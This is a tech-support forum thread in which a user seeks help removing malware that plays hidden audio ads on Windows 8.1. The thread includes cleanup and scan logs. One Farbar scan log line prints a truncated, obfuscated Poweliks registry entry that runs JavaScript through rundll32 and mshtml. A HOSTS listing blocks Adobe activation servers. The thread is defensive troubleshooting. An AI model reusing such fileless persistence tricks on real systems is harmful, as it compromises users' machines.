Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Audio ads/sounds playing in background occasionally on startup


  • This topic is locked This topic is locked
25 replies to this topic

#1 WTTT3

WTTT3

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 28 December 2014 - 09:13 PM

Not every time the computer loads, but occasionally I will have extra background audio ads that play randomly in the background of my computer, even when no programs are running at all. Sometimes it is just people talking and it's not really even an ad at all. I can run RKill to get rid of it for the time being, but other than that, nothing works. This audio in the background is the only problem for the computer. No other noticeable viruses, etc. Thanks for the help.

Edited by Queen-Evie, 28 December 2014 - 11:24 PM.
moved from Windows 8 to the appropriate forum


BC AdBot (Login to Remove)

 


m

#2 Digital_Veil

Digital_Veil

  • Members
  • 259 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:46 AM

Posted 28 December 2014 - 10:30 PM

Download and run Adwcleaner and see if it helps.



#3 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 29 December 2014 - 12:06 AM

Thank you. I don't know if it worked because it happens randomly/occasionally so I guess I'll know after a few days... but here is the log after the restart:

 

# AdwCleaner v4.106 - Report created 28/12/2014 at 22:53:21
# Updated 21/12/2014 by Xplode
# Database : 2014-12-28.1 [Live]
# Operating System : Windows 8.1  (64 bits)
# Username : JWT - WISDOM-G
# Running from : C:\Users\JWT\Downloads\AdwCleaner (1).exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\Users\JWT\AppData\Local\Hola
File Deleted : C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_static.olark.com_0.localstorage-journal
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17416
 
 
-\\ Mozilla Firefox v33.0.3 (x86 en-US)
 
 
-\\ Google Chrome v39.0.2171.95
 
 
*************************
 
AdwCleaner[R0].txt - [1829 octets] - [21/08/2014 12:40:24]
AdwCleaner[R1].txt - [1889 octets] - [21/08/2014 12:42:38]
AdwCleaner[R2].txt - [1128 octets] - [28/12/2014 22:47:44]
AdwCleaner[S0].txt - [1926 octets] - [21/08/2014 12:44:01]
AdwCleaner[S1].txt - [1054 octets] - [28/12/2014 22:53:21]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [1114 octets] ##########


#4 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 29 December 2014 - 09:07 PM

I just started up my computer and it was running really slow. Slower than ever in the 6 months I've had it. Some programs weren't working (automatic "stopped working" as it was loading) or like when I tried to open iTunes for example, it was having me click agree/disagree to the TOS like it was the first time I ever opened it. And it was taking like a minute to even load up after that. Starting and restarting the program was asking me to "Agree" every time.

 

I tried to load up Malwarebytes and it said at the top that I've never ran a scan on the computer before (very untrue, i run a scan often) and was asking me to click FIX NOW. When I would click FIX NOW it would automatically shut down the entire program ("Malwarebytes has stopped working"). Same thing happened if I clicked UPDATE NOW or anything on Malwarebytes. I ran Windows Defender and it picked up a "serious issue" of:

 

Trojan: Win32/Powessere.A!reg

 

So I "cleaned" it out with Windows Defender and it said it was a success. I also didn't really hear any of those ads or random audio playing the background for those 10-15 mins I did this. I decided to reboot the computer.

 

After this, the computer was running faster and everything appeared to be back to normal. However, I heard an audio explosion right away and the weird audio "ads" showed up again. This time it was the common one of what seemed like a 12 yr old kid talking on a livestream or youtube channel to his "12,000" subscribers about video games, etc over a techno beat. This goes on for about 3 minutes. Then stops. Until about 5 minutes later another sound comes on and it's just like loud music playing for a few minutes. Then it stops and 5 minutes later, more audio comes on that is just random talking. This then stops and later it goes back to the young kid talking on his livestream or whatever, same exact 3-4 minute recording every time of the kid.

 

Malwarebytes was also still not functioning properly (automatic shut down if I tried to press any buttons on it). So i uninstalled Malwarebytes and reinstalled it and ran a scan. This was successful, however it didn't find anything.. which is expected because it never picked up on this issue anyways so I didn't expect it to. But it didn't pick up any other (potentially new) problems.

 

I also ran RKill, which is what I normally do to just mask the problem for the time being and it always works fine and I forget about the background audio issue... Here is the RKill log and thank you for any help you can provide!

 

 

Rkill 2.6.9 by Lawrence Abrams (Grinler)
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 12/29/2014 07:33:55 PM in x64 mode.
Windows Version: Windows 8.1 
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * C:\Windows\SysWOW64\lnsecsl.exe (PID: 6180) [WD-HEUR]
 * C:\WINDOWS\TEMP\mrt54B6.tmp\stdrt.exe (PID: 1480) [WD-HEUR]
 
2 proccesses terminated!
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Reparse Point/Junctions Found (Most likely legitimate)!
 
     * C:\WINDOWS\Temp\10d0\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\10d0\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\1118\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\1118\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\1730\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\1730\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\190c\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\190c\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\1fe4\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\1fe4\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\22dc\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\22dc\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\254c\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\254c\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2660\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2660\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2874\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2874\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\28f8\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\28f8\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2ac4\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2ac4\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2cb8\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2cb8\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2f68\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2f68\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3210\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3210\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3798\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3798\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3900\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3900\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3ad0\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3ad0\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\4810\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\4810\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\48c4\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\48c4\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\4c88\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\4c88\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\770\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\770\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\ffc\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\ffc\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
 
Checking Windows Service Integrity: 
 
 * No issues found.
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * HOSTS file entries found: 
 
  127.0.0.1 3dns.adobe.com 3dns-1.adobe.com 3dns-2.adobe.com 3dns-3.adobe.com 3dns-4.adobe.com activate.adobe.com activate-sea.adobe.com activate-sjc0.adobe.com activate.wip.adobe.com
  127.0.0.1 activate.wip1.adobe.com activate.wip2.adobe.com activate.wip3.adobe.com activate.wip4.adobe.com adobe-dns.adobe.com adobe-dns-1.adobe.com adobe-dns-2.adobe.com adobe-dns-3.adobe.com adobe-dns-4.adobe.com
  127.0.0.1 adobeereg.com practivate.adobe practivate.adobe.com practivate.adobe.newoa practivate.adobe.ntp practivate.adobe.ipp ereg.adobe.com ereg.wip.adobe.com ereg.wip1.adobe.com
  127.0.0.1 ereg.wip2.adobe.com ereg.wip3.adobe.com ereg.wip4.adobe.com hl2rcv.adobe.com wip.adobe.com wip1.adobe.com wip2.adobe.com wip3.adobe.com wip4.adobe.com
  127.0.0.1 www.adobeereg.com wwis-dubc1-vip60.adobe.com www.wip.adobe.com www.wip1.adobe.com
  127.0.0.1 www.wip2.adobe.com www.wip3.adobe.com www.wip4.adobe.com wwis-dubc1-vip60.adobe.com crl.verisign.net CRL.VERISIGN.NET ood.opsource.net
  127.0.0.1 practivate.adobe.com
  127.0.0.1 ereg.adobe.com
  127.0.0.1 activate.wip3.adobe.com
  127.0.0.1 wip3.adobe.com
  127.0.0.1 3dns-3.adobe.com
  127.0.0.1 3dns-2.adobe.com
  127.0.0.1 adobe-dns.adobe.com
  127.0.0.1 adobe-dns-2.adobe.com
  127.0.0.1 adobe-dns-3.adobe.com
  127.0.0.1 ereg.wip3.adobe.com
  127.0.0.1 activate-sea.adobe.com
  127.0.0.1 wwis-dubc1-vip60.adobe.com
  127.0.0.1 activate-sjc0.adobe.com
  127.0.0.1 practivate.adobe.com
 
  20 out of 32 HOSTS entries shown.
  Please review HOSTS file for further entries.
 
Program finished at: 12/29/2014 07:34:14 PM
Execution time: 0 hours(s), 0 minute(s), and 19 seconds(s)


#5 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 29 December 2014 - 10:06 PM

Also it should be noted... After restarting the computer again, the background audio came up right away (has last 4 times in a row). I was having trouble running RKill and my C Drive was filling up quickly, I don't know why. But I cleared out space and ran RKill. Then I ran Windows Defender and got this again:

 

Trojan: Win32/Powessere.A!reg

 

Because I was having trouble running things and my C Drive was filling up, I tried running CCleaner and was having a lot of trouble getting it to run smoothly. Because of this, I ran Malwarebytes again. This time it "detected malware":

 

Backdoor.Bot - File - C:Windows\SysWOW64\Insecsl.exe

Backdoor.Bot - Key - HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\Adobe Licensing Console

 

I "applied actions" (quarantine) and restarted upon request.



#6 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 29 December 2014 - 10:25 PM

After I restarted this last time, I didn't get the background audio (not unusual) and the computer started up very quickly after I typed in my Windows login password (as opposed to 5-10 seconds to load if the background audio "ads" are going to appear).

 

However, after running Windows Defender, I still got this: Trojan: Win32/Powessere.A!reg   ... I hit "clean" and it "successfully removed". I noticed that right after this (without restarting computer or shutting down Windows Defender), when I clicked update, it downloaded updates, even though I had just updated it. So then I ran a scan again (haven't restarted computer or even closed Defender) and it picked up the Trojan: Win32/Powessere.A!reg again, so it apparently never even removed it, or it just pretended it did, I don't know. It says it is "Severe" threat level. I clicked "remove" again (debated on changing to "quarantine" this time but didn't know what to do). But it appears that it doesn't go anywhere after Windows Defender says it is "removed successfully"



#7 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,015 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:09:16 PM

Posted 30 December 2014 - 07:48 AM

Hi WTTT3,
 
I'll be working with you now. Lets see what this log shows:
 
Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.
 
--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • FRST.txt
  • Addition.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

~Currently in my last year of school, so replies might be more delayed~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#8 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • OFFLINE
  •  
  • Local time:03:16 PM

Posted 30 December 2014 - 08:28 AM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 28-12-2014
Ran by JWT (administrator) on WISDOM-G on 30-12-2014 07:21:00
Running from C:\Users\JWT\Desktop
Loaded Profile: JWT (Available profiles: JWT)
Platform: Windows 8.1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(ASUS) C:\Program Files\ASUS\P4G\InsOnSrv.exe
() C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
(ASUS) C:\Program Files\ASUS\P4G\InsOnWMI.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(ASUS) C:\Program Files\ASUS\P4G\BatteryLife.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDGesture.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Octoshape ApS) C:\Users\JWT\AppData\Roaming\Octoshape\Octoshape Streaming Services\OctoshapeClient.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
() C:\Program Files (x86)\ASUS Gaming Mouse\hid.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13650648 2013-08-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-06] (Realtek Semiconductor)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2890128 2013-04-11] (ELAN Microelectronics Corp.)
HKLM\...\Run: [UMonit64] => C:\Windows\SysWOW64\UMonit64.exe [40960 2013-03-14] ()
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2531472 2014-12-12] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [3187360 2013-05-01] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ASUSWebStorage] => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSPanel.exe [3576784 2012-12-19] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [BDRegion] => C:\Program Files (x86)\Cyberlink\Shared files\brs.exe [181208 2013-04-24] (cyberlink)
HKLM-x32\...\Run: [ROGNB] => C:\Program Files (x86)\ASUS Gaming Mouse\hid.exe [463872 2013-05-15] ()
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS5.5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5.5ServiceManager\CS5.5ServiceManager.exe [1523360 2011-01-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [134784 2014-01-24] ( (Qualcomm®Atheros®))
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\Run: [Octoshape Streaming Services] => C:\Users\JWT\AppData\Roaming\Octoshape\Octoshape Streaming Services\OctoshapeClient.exe [107800 2011-03-24] (Octoshape ApS)
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\Run: [Google Update] => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe [107912 2014-11-22] (Google Inc.)
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\MountPoints2: {f2689990-9778-11e3-be83-bcee7b0da09b} - "H:\VZW_Software_upgrade_assistant.exe" 
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk
ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{B42E4545-2F62-45AB-9B28-E255454CB425}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4D} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus13.msn.com
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\ssv.dll (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\jp2ssv.dll (Oracle Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 205.171.2.25
 
FireFox:
========
FF ProfilePath: C:\Users\JWT\AppData\Roaming\Mozilla\Firefox\Profiles\u3ip9ptp.default
FF SelectedSearchEngine: Google
FF Homepage: about:home
